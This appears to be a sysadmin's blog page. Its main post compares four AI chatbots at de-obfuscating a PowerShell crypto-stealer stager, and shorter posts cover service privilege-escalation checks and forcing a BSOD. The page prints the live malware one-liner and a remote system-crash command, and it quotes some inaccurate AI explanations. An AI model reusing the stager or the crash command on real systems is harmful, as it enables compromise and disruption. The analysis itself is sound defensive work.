Malware Analysis: GPT3.5 vs 4 vs Bing Chat vs Bard

Standard

I’ll just ignore the fact that this is my first post in 1683 days, because I can.

Today we are going to have a look at how ChatGPT revolutionized the way we perform static malware analysis, specifically obfuscated code analysis, AND I will be comparing the output of the top 4 currently available AI tools: ChatGPT-3.5, ChatGPT-4, Bing Chat GPT-4 and Google Bard.

In the last couple of days one of my sandbox machines got infected with a new PowerShell-based CryptoStealer (Yay me 🎉 little do they know that I’m currently crypto-broke), which runs in 3 phases: a stager, which runs a second stage-like piece of code, which in turn communicates with a C2 server over DNS to run the actual malware in memory.

We will use the first PowerShell stager as an example for today, which is an obfuscated PS one-liner command that executes another script hidden in the registry. File contents below:

$JEzTkjdyrhDpDt=[ScriptBlock]; icm ($JEzTkjdyrhDpDt::Create([string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))))

Depending on your PowerShell skills, it might take you anywhere from a couple of minutes to half an hour to manually de-obfuscate this code, but this ain’t the 2010s anymore, we have AI on our side now, so let’s use our new slaves to reduce this time to mere seconds.

I used the following prompt, followed by the stager code:

Rewrite the following obfuscated PowerShell script in a way that is easy to understand then explain what does it do, and, in summary, its main goal:

PS: I didn’t run any follow-up prompts to attempt to get better results; the displayed output is based solely on the initial prompt.

Let’s check the results of each of the 4 tools:

ChatGPT-3.5

The PowerShell script you provided executes a single line of code that is heavily obfuscated, making it difficult to understand what it does.
Here is a simplified version of the script that is easier to read and understand:

$code = [string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))
$block = [ScriptBlock]::Create($code)
Invoke-Command $block

This code creates a ScriptBlock object from an obfuscated string of code, then executes it using the Invoke-Command cmdlet. The main goal of this script is to execute the code contained in the obfuscated string. However, without knowing what the obfuscated code does, it's difficult to determine the purpose of the script as a whole.

Comments on ChatGPT-3.5

You call that de-obfuscated code??? My 4-year-old daughter can do better, thanks for nothing.

The goal description is also pretty useless, shame…

ChatGPT-4

The obfuscated PowerShell script can be rewritten in a more understandable way as follows:

$ScriptBlock = [ScriptBlock]
$ReversedString = 'kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH'
$Matches = [regex]::Matches($ReversedString, '.', 'RightToLeft') | ForEach {$_.value}
$JoinedMatches = -join $Matches
$Property = (gp $JoinedMatches).'Ge1WvZfVx'
$DecodedChars = $Property | % { [char]$_ }
$DecodedString = -join $DecodedChars
Invoke-Command -ScriptBlock $ScriptBlock::Create($DecodedString)

The script does the following:

1. Creates an empty ScriptBlock called $ScriptBlock.
2. Uses regex to reverse the string 'kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH', which results in 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'.
3. Creates a new script block using the newly obtained string as a path and appending 'Ge1WvZfVx' to the end of the path, creating 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ge1WvZfVx'.
4. Invokes the newly created script block using Invoke-Command.

In summary, the main goal of the script is to execute a hidden PowerShell script stored in the registry under the path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ge1WvZfVx'. The obfuscation is likely done to avoid detection by antivirus or other security measures, which is a common technique used in malicious scripts.

Comments on ChatGPT-4

While the reversed registry key path is not 100% accurate, it rewrote the code in separate steps, made it much easier to understand, then explained it!

It also provided a very useful goal description: clear, easy to understand and very accurate. It even used the word “hidden”, how cool is that!!
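For reference, here is a static decoder that walks the stager’s three steps (reverse the string, read the registry value, convert the character codes back to text) without ever building or invoking the script block, which is what you want when confirming what an AI tool told you. This is added example code, not from the post; it assumes, as the stager’s `[char]$_` conversion implies, that the registry value is an array of character codes, and the sample payload used when the key is absent is constructed.

```powershell
# Added example (not from the original post): decode the stager statically,
# i.e. walk the same steps as the one-liner but never hand the result to
# [ScriptBlock]::Create or Invoke-Command.

# Step 1: undo the string reversal. [regex]::Matches with 'RightToLeft' returns
# the single-character matches from right to left, which is the string reversed.
function Get-ReversedString {
    param([string]$Obfuscated)
    ([regex]::Matches($Obfuscated, '.', 'RightToLeft') | ForEach-Object { $_.Value }) -join ''
}

# Step 2: turn the registry value (an array of character codes, as the stager's
# `[char]$_` conversion implies) back into script text.
function ConvertFrom-CharCodes {
    param([int[]]$Codes)
    -join ($Codes | ForEach-Object { [char]$_ })
}

# Step 3: read the hidden value from the registry key the stager points at.
# Returns $null when the key or value is absent (e.g. on a clean analyst box).
function Get-HiddenScriptText {
    param([string]$ReversedPath, [string]$ValueName)
    $keyPath = Get-ReversedString $ReversedPath
    $item = Get-ItemProperty -Path $keyPath -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    ConvertFrom-CharCodes -Codes $item.$ValueName
}

# Strings taken verbatim from the stager on the page
$reversedPath = 'kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH'
$valueName    = 'Ge1WvZfVx'

# Reversal yields HKLM:\SOFTWARE\Martin PrikrylPeZSBdbvk
"Registry key: $(Get-ReversedString $reversedPath)"
"Value name:   $valueName"

$hidden = Get-HiddenScriptText -ReversedPath $reversedPath -ValueName $valueName
if ($hidden) {
    "Recovered second stage (NOT executed):`n$hidden"
} else {
    # Offline demo: a constructed payload shows the char-code decoding on a clean box
    $sample = [int[]][char[]]'Write-Host "constructed sample payload"'
    "Key not present on this machine; decoding a constructed sample instead:"
    ConvertFrom-CharCodes -Codes $sample
}
```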

Bing Chat GPT-4

The PowerShell script you provided is obfuscated. Obfuscation is the practice of making code difficult to understand or read. It is often used to protect intellectual property or to hide malicious code.

The script appears to be using the Invoke-Command cmdlet (icm) to execute a script block ($JEzTkjdyrhDpDt::Create([string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ })))).

The script block is stored in the variable $JEzTkjdyrhDpDt. The script block appears to be created by calling the Create method on the $JEzTkjdyrhDpDt object. The Create method appears to be taking a string as input. The string is created by joining together the results of several commands.

Unfortunately, without more context it is difficult to determine what the script block does or what its main goal is. If you can provide more information about where this script came from or what it is supposed to do, I may be able to help you better.

Comments on Bing Chat

It didn’t even bother to try to write a de-obfuscated version of the code; we got a nimrod over here…

Also, it tried to explain the obvious at the code level (poorly), and came nowhere close to describing the goal or giving a high-level explanation.

Google Bard

Sure, I can help you with that. Here is the rewritten PowerShell script:

$JEzTkjdyrhDpDt = [ScriptBlock]::Create('
$args = @()
foreach ($arg in $args) {
iex $arg
}
')

icm $JEzTkjdyrhDpDt::Create([string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))))

This script is a simple malware that runs a command on the system. It first creates a new script block, which is a type of PowerShell object that can be used to execute code. The script block contains a simple loop that executes the commands that are passed to it. The script then uses the Get-Process cmdlet to get a list of all the processes that are running on the system. It then uses the Regex cmdlet to find all of the processes that match a certain pattern. The pattern that it is looking for is kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH. This pattern is actually a string that has been reversed. When the string is reversed, it becomes HELLO WORLD. The script then uses the ForEach-Object cmdlet to iterate over the list of processes that match the pattern. For each process, it uses the iex cmdlet to execute the command that is associated with the process.

The main goal of this script is to run a command on the system. The command that it runs is determined by the string that is passed to it. The string that is passed to it is actually a reversed string that contains the command that the script should run.

Comments on Bard

Bard did try to de-obfuscate the code, but did so very poorly; useless.

But it DID identify it as malware, so kudos for that; it also knew the main goal (executing a command on the system), although it got choked up on the technicalities.

Verdict

This is an easy one: Chapeau bas to the OG, ChatGPT-4 is just on another level!
Of course the others COULD perform better with follow-up prompts, but ChatGPT-4 did not require any 🤩

What do you think? Have you tried any more powerful tools for this type of analysis?

Evading Palo Alto Traps Anti-Ransomware Protection (OBSOLETE)

This piece could be the shortest article you have/will read today, so don’t blink:

The PoC script below mimics ransomware: it wipes the whole D: drive except some pre-excluded files and folders ($TrustedFiles and $TrustedFolders).
When running this script, Traps (version 4.1.0 and above, with the Anti-Ransomware module activated) will flag it as ransomware and kill the process, because it performs bulk file/folder modification:

The (Awesome) Universal Uninstall Script

So, it is the final quarter of the year, internal audit has just woken up from their hibernation directly up your…sleeves, and wants to keep stuff compliant.

Your manager, for the little sadist that he is, sends you a list of some twenty+ applications to uninstall from all the end-user machines.

As you have already experienced the pain of uninstalling different applications from different vendors, you know that not every vendor provides a way to perform a silent/command-line uninstallation.

So you tell your manager: Not this time you neo-fascist! (In your mind, of course, you don’t want to end up on the streets working for Facebook, because #DeleteFacebook right? Too much? ok…)

Today we will use a commercial uninstall tool coupled with our custom script to uninstall virtually any software, remotely and silently.

First, you need to buy Revo Uninstaller Pro Portable; it costs around $30 per year, cheaper than a mid-fancy dinner.
Then you create a deployment package, save my following script in the same directory as RevoUnPro.exe and publish it to all your users:

Windows Privilege Escalation: Automatically Detecting Vulnerable Services

Hello People,

I know I know, it’s been a while, but who’s counting!

So, a very quick overview of Windows privilege escalation using misconfigured services: if the DACL on a service’s executable allows any normal (non-admin) user to delete it, then any user can replace that executable with another one of his choosing and have it run as Admin when the service starts! (Please ignore the plethora of “any”…)

Below is a mini/mildly-dirty script that I wrote to check all local services for this weakness:

$vulnList = @()
foreach ($svc in (Get-WmiObject win32_service | select Name, PathName)) {
	# Quoted path: take the part between the quotes; unquoted: take the first token
	if ([string]::IsNullOrWhiteSpace($svc.PathName)) { continue }
	if ($svc.PathName -match '^"([^"]+)"') { $path = $Matches[1] } else { $path = ($svc.PathName -split ' ')[0] }
	if (-not (Test-Path -LiteralPath $path)) { continue }

	# Reset on every iteration so a previous service's ACL output is never reused
	[string]$resp = icacls $path
	if ($resp.Contains("Everyone:(F)") -or $resp.Contains("Everyone:(I)(F)")){
		$vulnList += $path
	}
}
$vulnList

This script enumerates the executable path of every local service and checks each one’s DACL, looking for the ACE Everyone:(F), which means “Everyone” has full control over the file.
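A deeper version of the same audit, added here and not the author’s script: instead of string-matching icacls output for Everyone:(F), it reads each service binary’s DACL with Get-Acl and reports any write-class right (Write, Modify, Delete, FullControl, ChangePermissions, TakeOwnership) granted to the usual low-privilege principals, which catches misconfigurations the Everyone-only check misses. The principal list is an assumption; extend it for your environment.

```powershell
# Added example (not the post's script): report services whose executable grants
# write-class rights to low-privileged principals, i.e. rights that let a
# non-admin replace or alter the binary that the service runs.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')  # assumption: extend per environment
$WriteRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, Delete, FullControl, ChangePermissions, TakeOwnership'

function Get-ServiceExecutablePath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    # Quoted path: take the quoted part. Unquoted: take the first whitespace-delimited token.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Find-WeakServiceBinaries {
    foreach ($svc in Get-WmiObject Win32_Service) {
        $path = Get-ServiceExecutablePath $svc.PathName
        if (-not $path -or -not (Test-Path -LiteralPath $path)) { continue }
        try { $acl = Get-Acl -LiteralPath $path -ErrorAction Stop } catch { continue }
        $weak = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $LowPrivPrincipals -contains $_.IdentityReference.Value -and
            (([int]$_.FileSystemRights -band [int]$WriteRights) -ne 0)
        }
        if ($weak) {
            [pscustomobject]@{
                Service  = $svc.Name
                RunsAs   = $svc.StartName        # the account a replaced binary would run under
                Path     = $path
                WeakACEs = ($weak | ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }) -join '; '
            }
        }
    }
}

Find-WeakServiceBinaries | Format-Table -AutoSize
```

Run it elevated on a test machine and every reported row is a binary a non-admin could swap out; fixing the ACL (or the installer that set it) is the remediation.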

While testing on a dummy machine, I found a sneaky service that comes by default with this specific computer model:

DNS Self-Service with Orchestrator

Monday morning, you’re sitting in the comfort of your cubicle, playing Minecraft, building a giant pixelated reptile, determined and focused, when suddenly a new Outlook toast with “New DNS record creation request” as the subject appears… You feel like:

Ain't nobody got time for that

You know the feeling, that woman is my role model!

Imagine if you could just reply to the man with “Use the DNS self-service form, fiend” and continue with your masterpiece.

Fret not, old friend, that is exactly what we are going to do today !

DSC vs Group Policy: In Plain English!

Internet, we meet again!

No, it didn’t take me 14 months to write this article, I just had a bad case of fleas that took a while to shake off (metaphorically, of course).

As you already know, Windows Server 2012 R2 ships with the new PowerShell feature/framework: Desired State Configuration. In this article I will list a summary of the key differences between Group Policy and DSC, in ENGLISH.
Microsoft provides several other tools to manage Windows besides GP and DSC (e.g. SCCM DCM, Intune), but I wanted to compare these two specifically, mainly because they are free.
Enough chit-chat; the differences, in no particular order:

  • DSC, by using MOF files (which are not proprietary to Windows), can manage Linux boxes, while Group Policy (currently) can’t.
  • DSC can consume any MOF file created by any future 3rd-party product that leverages DSC as a policy engine.
  • DSC is easy to extend (the only limit is PowerShell’s potency), whereas extending Group Policy can be really daunting.
  • DSC writes all errors to the Windows event logs when things go south, while not all Group Policy settings do that.
  • DSC’s periodic configuration refresh checks for updates every 15 minutes by default, whereas Group Policy’s background refresh can take up to 120 minutes.
  • DSC stores the required configuration and resources locally, so even without a network connection the configuration refresh WILL occur, whereas Group Policy requires connectivity to AD and SYSVOL to perform its background refresh.
  • DSC configurations/policies can be applied to workgroup machines, so your DMZ machines will never be out of shape again, whereas Group Policy requires the machine to be in an AD domain.
  • DSC, while declarative, does not have any GUI (yet), while Group Policy’s GUI is easy to use and well known.
  • DSC is more complex to apply, whereas Group Policy is click-driven.
  • DSC provides centralized triggering of configuration distribution, while Group Policy relies on the GP client to trigger refreshes.
  • Group Policy uses a combination of event-driven mechanisms (like computer startup and user logon), while DSC does not have anything like that yet.
  • DSC tattoos its changes onto the machine: when a DSC configuration item is no longer applied, its changes do not revert to their original state, whereas “most” Group Policy settings are not tattooed (GPP is another story).
  • DSC scripts are more human-readable than a raw Group Policy file.
  • In my opinion, DSC is more likely to be used on servers, while Group Policy is still for both servers and clients (excluding perimeter machines).

That’s it, short and simple, I hope you’ve found it useful. Let me know what you think by leaving a comment below.
Until next year (hopefully not), have a great one!

 

Poor man’s enterprise remote support solution

There are tons of remote support tools for AD environments, but most of them are commercial, and some are user-initiated (like the Lync 2010+ desktop sharing feature). Today we will implement an agentless (sort of), free and pretty effective solution. The end result is a box in which you enter the username of the person you’re trying to help, et voilà, you have control over his screen! (Gentlemen, after his permission, of course.)

Chapter I:

The base application we will use is “Windows Remote Assistance”, which ships for free with most Windows 7 flavors; the rest is scripting gimmickry.

Out of the box, Windows Remote Assistance works if the requester sends an invitation file to the helper, but in our case we want to initiate the process by offering our help before we even hear the nagging.

To do so, we need to create a GPO, linked to our computers’ OU, that enables just that:

Computer Configuration > Policies > Administrative Templates > System > Remote Assistance

Enable the “Offer Remote Assistance” option and select who can offer remote support; typically you will add your Help Desk group.

Enabling WRS in a GPO

After you gpupdate the end-user’s machine, try it:

Open “Windows Remote Assistance” from your helper workstation, then click on

Producing an Intentional BSOD (Blue Screen of Death)

In some cases you may feel an urge to experience a lucid nightmare intentionally: to generate a Blue Screen of Death!

Why? You may have some sort of cluster configuration or some kind of HA solution that you want to dirty-test.

This can be done in several ways, one of which involves editing the registry and using the NumLock key, but the one we’ll check today is much simpler.

First you need to have PowerShell installed (you can produce the same outcome with any tool that can interface with WMI; PowerShell is just the easiest).

Then open an elevated PowerShell console and type:

Get-Process | Stop-Process

A nice BSOD will appear

If you want to produce a BSOD on a remote machine, you need to have PowerShell remoting enabled and some firewall exceptions added to the target. To do so, open an elevated command prompt console (on the remote machine) and run:

winrm quickconfig

Then from your machine, issue the following:

Enter-PSSession ComputerName
Get-Process|Stop-Process

That’s my time for today, see you in a few days (or weeks…or months)

RDP 7 vs RDP 8: Wan Optimization, Zombies Style

Yes, 5 months have passed since my last post, I was busy, with, uhmm, stuff…

Now enough with my hypocrisy; today my curious monkey refused to sleep before I tested the new “WAN Optimization” that Microsoft allegedly added to the RDP v8.0 feature set that ships natively with Windows Server 2012.

So I set up 2 client machines, one with the RDP v7.1 client and another with RDP v8.0; I will be connecting to my remote machine from home via an RD Gateway server located in our remote branch’s DMZ.

Now we have to find some material worth testing on, and what is more frustrating than playing Flash games over RDP? Their rich graphics, high frame rates and fade in/out (alpha) effects make them the best candidate.

I decided to go with something zombie-related; “Earn to die 2012” is a great game (Disclaimer above): www.flashgames247.com/play/15994.html

*Round 1: RDP client v7.1 connecting to RDP v7.1 (or v8.0)

  • Of course RDP v8.0 is backward compatible, so if you connect from a v7.1 client it will work, but you will not get v8’s features
  • General Experience: Very slow and choppy gameplay, hangs when fading effects come into play, quality is good
  • Judgment: Unplayable

 not choppy
